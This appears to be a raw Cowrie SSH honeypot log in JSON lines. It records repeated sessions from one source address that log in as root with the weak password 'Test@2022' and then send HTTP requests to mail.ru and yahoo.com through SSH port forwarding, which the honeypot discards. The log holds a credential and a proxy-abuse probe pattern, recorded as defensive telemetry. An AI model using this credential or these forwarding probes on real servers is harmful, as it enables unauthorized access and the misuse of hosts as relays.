{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:36.113820Z","src_ip":"77.83.207.83","session":"cd4dc92de069"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:36.164379Z","src_ip":"77.83.207.83","session":"cd4dc92de069"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":25000,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8ee7a3d0dd9","protocol":"ssh","message":"New connection: 77.83.207.83:25000 (1.2.3.4:22) [session: e8ee7a3d0dd9]","sensor":"my-vps","timestamp":"2025-08-31T03:51:36.214131Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:36.215142Z","src_ip":"77.83.207.83","session":"e8ee7a3d0dd9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"11.5","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 11.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:36.230116Z","src_ip":"212.227.125.160","session":"8ec147866074"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:36.265337Z","src_ip":"77.83.207.83","session":"e8ee7a3d0dd9"}
{"eventid":"cowrie.session.closed","duration":"75.7","message":"Connection lost after 75.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:36.340607Z","src_ip":"212.227.125.160","session":"8ec147866074"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:36.515910Z","src_ip":"77.83.207.83","session":"e8ee7a3d0dd9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":5290,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:5290","sensor":"my-vps","timestamp":"2025-08-31T03:51:36.567160Z","session":"e8ee7a3d0dd9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:36.617531Z","src_ip":"77.83.207.83","session":"e8ee7a3d0dd9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":3815,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:3815","sensor":"my-vps","timestamp":"2025-08-31T03:51:36.760669Z","session":"e8ee7a3d0dd9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:36.811014Z","src_ip":"77.83.207.83","session":"e8ee7a3d0dd9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":18268,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:18268","sensor":"my-vps","timestamp":"2025-08-31T03:51:36.952624Z","session":"e8ee7a3d0dd9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:37.003044Z","src_ip":"77.83.207.83","session":"e8ee7a3d0dd9"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:37.054643Z","src_ip":"77.83.207.83","session":"e8ee7a3d0dd9"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":25136,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e038df4fc32","protocol":"ssh","message":"New connection: 77.83.207.83:25136 (1.2.3.4:22) [session: 7e038df4fc32]","sensor":"my-vps","timestamp":"2025-08-31T03:51:37.104306Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:37.104975Z","src_ip":"77.83.207.83","session":"7e038df4fc32"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:37.156056Z","src_ip":"77.83.207.83","session":"7e038df4fc32"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:37.410104Z","src_ip":"77.83.207.83","session":"7e038df4fc32"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":1706,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:1706","sensor":"my-vps","timestamp":"2025-08-31T03:51:37.461961Z","session":"7e038df4fc32"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:37.513201Z","src_ip":"77.83.207.83","session":"7e038df4fc32"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":13753,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:13753","sensor":"my-vps","timestamp":"2025-08-31T03:51:37.657205Z","session":"7e038df4fc32"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:37.708252Z","src_ip":"77.83.207.83","session":"7e038df4fc32"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":22910,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:22910","sensor":"my-vps","timestamp":"2025-08-31T03:51:37.853251Z","session":"7e038df4fc32"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:37.904116Z","src_ip":"77.83.207.83","session":"7e038df4fc32"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:37.955940Z","src_ip":"77.83.207.83","session":"7e038df4fc32"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":25241,"dst_ip":"1.2.3.4","dst_port":22,"session":"8292731131f6","protocol":"ssh","message":"New connection: 77.83.207.83:25241 (1.2.3.4:22) [session: 8292731131f6]","sensor":"my-vps","timestamp":"2025-08-31T03:51:38.005120Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:38.006866Z","src_ip":"77.83.207.83","session":"8292731131f6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:38.057325Z","src_ip":"77.83.207.83","session":"8292731131f6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:38.309382Z","src_ip":"77.83.207.83","session":"8292731131f6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":14849,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:14849","sensor":"my-vps","timestamp":"2025-08-31T03:51:38.360735Z","session":"8292731131f6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:38.411446Z","src_ip":"77.83.207.83","session":"8292731131f6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":30391,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:30391","sensor":"my-vps","timestamp":"2025-08-31T03:51:38.552882Z","session":"8292731131f6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:38.603413Z","src_ip":"77.83.207.83","session":"8292731131f6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":6750,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:6750","sensor":"my-vps","timestamp":"2025-08-31T03:51:38.744823Z","session":"8292731131f6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:38.795372Z","src_ip":"77.83.207.83","session":"8292731131f6"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:38.847247Z","src_ip":"77.83.207.83","session":"8292731131f6"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":25339,"dst_ip":"1.2.3.4","dst_port":22,"session":"8df6ae91e24b","protocol":"ssh","message":"New connection: 77.83.207.83:25339 (1.2.3.4:22) [session: 8df6ae91e24b]","sensor":"my-vps","timestamp":"2025-08-31T03:51:38.895804Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:38.896502Z","src_ip":"77.83.207.83","session":"8df6ae91e24b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:38.946885Z","src_ip":"77.83.207.83","session":"8df6ae91e24b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:39.194228Z","src_ip":"77.83.207.83","session":"8df6ae91e24b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":4861,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:4861","sensor":"my-vps","timestamp":"2025-08-31T03:51:39.245078Z","session":"8df6ae91e24b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:39.294949Z","src_ip":"77.83.207.83","session":"8df6ae91e24b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":22205,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:22205","sensor":"my-vps","timestamp":"2025-08-31T03:51:39.436207Z","session":"8df6ae91e24b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:39.485882Z","src_ip":"77.83.207.83","session":"8df6ae91e24b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":1204,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:1204","sensor":"my-vps","timestamp":"2025-08-31T03:51:39.628350Z","session":"8df6ae91e24b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:39.678186Z","src_ip":"77.83.207.83","session":"8df6ae91e24b"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:39.729123Z","src_ip":"77.83.207.83","session":"8df6ae91e24b"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":25459,"dst_ip":"1.2.3.4","dst_port":22,"session":"d53fee7c0232","protocol":"ssh","message":"New connection: 77.83.207.83:25459 (1.2.3.4:22) [session: d53fee7c0232]","sensor":"my-vps","timestamp":"2025-08-31T03:51:39.778839Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:39.779933Z","src_ip":"77.83.207.83","session":"d53fee7c0232"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:39.830188Z","src_ip":"77.83.207.83","session":"d53fee7c0232"}
